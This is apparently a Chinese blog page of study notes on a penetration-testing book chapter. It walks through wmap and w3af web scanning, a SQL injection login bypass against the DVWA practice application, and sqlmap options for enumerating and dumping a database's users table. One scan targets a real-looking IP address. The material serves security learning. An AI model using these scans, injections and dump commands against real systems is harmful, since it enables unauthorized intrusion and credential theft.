第四章笔记
来源:互联网 发布:数控编程 过程 编辑:程序博客网 时间:2024/06/03 17:31
1.wmap
msf>load wmap
msf>wmap_sites -a http://202.112.50.74
msf>wmap_sites -l
msf>wmap_targets -t http://202.112.50.74
msf>wmap_run -t
msf>wmap_run -e
解读,先添加一个网站site,令此网站作为一个目标target,接着调用模块扫描,再进行攻击。
BT5在这个模块有变化
这一步路径问题
msf>vulns出来的漏洞主机非目标主机
2.w3af(跟书上有些不同)
有两种工作模式:命令行与用户界面
kali自带,其他系统安装
root@bt:~# apt-get install w3af启动root@bt:~# cd /pentest/web/w3af/root@bt:/pentest/web/w3af# ./w3af_consolew3af>>> plugins//进入插件模块w3af/plugins>>> list discovery //列出所有用于发现的插件w3af/plugins>>> discovery findBackdoor phpinfo webSpider //启用findBackdoor phpinfo webSpider这三个插件w3af/plugins>>> list audit //列出所有用于漏洞的插件w3af/plugins>>> audit blindSqli fileUpload osCommanding sqli xss //启用blindSqli fileUpload osCommanding sqli xss这五个插件w3af/plugins>>> back//返回主模块w3af>>> target//进入配置目标的模块w3af/config:target>>> set target http://www.dvssc.com/dvwa/index.php//把目标设置为http://www.dvssc.com/dvwa/index.phpw3af/config:target>>> back//返回主模块开始扫描w3af>>> start
3.SQL注入
BT5打开http://www.dvssc.com/dvwa/login.php
猜解用户名admin’,密码为空
页面返回如下:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘202cb962ac59075b964b07152d234b70” at line 1
书上:near ”admin” AND password=”’ at line 1
不是
否则页面返回:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘admin’ or ‘1=1” AND password=’d41d8cd98f00b204e9800998ecf8427e” at line 1
服务器会自动加上首尾的”
成功进入后台.
sqlmap应用方式
a
msf > search sqlmsf > use auxiliary/scanner/http/sqlmapmsf auxiliary(sqlmap) > show optins
b.
oot@bt:~# cd /pentest/database/sqlmaproot@bt:/pentest/database/sqlmap# python sqlmap.py -h
c .注入实例 结合tamper data
发现参数id 存在注入点,并包含基于错误的sql注入和union查询注入.
获取数据库名 –dbs -v 0
获取表名 -D dvwa –tables
获取列名 -D dvwa –tables -T users –columns
拖库- D dvwa –tables -T users –columns –dump
- 学习笔记 第四章
- SQL笔记 第四章
- 第四章笔记
- 第四章笔记
- PRML第四章笔记
- Asp学习笔记第四章
- 学习笔记_第四章
- 第四章(笔记总结)
- 第四章 指令系统笔记简记
- 第四章 环境搭建笔记
- APUE 学习笔记(第四章)
- Javascript学习笔记【第四章】
- php笔记----第四章 函数
- Lua学习笔记-第四章
- ggplot2学习笔记-- 第四章
- VC课程 第四章 笔记
- 算法导论第四章笔记
- APUE-第四章-习题笔记
- linux环境下关闭后台进程
- TCP/IP
- 数据库中的日期
- d3.js学习笔记(2)—— Transition
- Android中给App设置NoActionBar/FullScreen
- 第四章笔记
- 2016sdau课程练习专题三 1017
- scala学习之update
- Tensorflow的MNIST进阶教程CNN网络参数理解
- Line Disciplines
- 堆和栈的区别
- 首页-底部Tab导航(菜单栏)的实现:FragmentTabHost+ViewPager+Fragment
- Android Fragment使用
- java学习之路--递归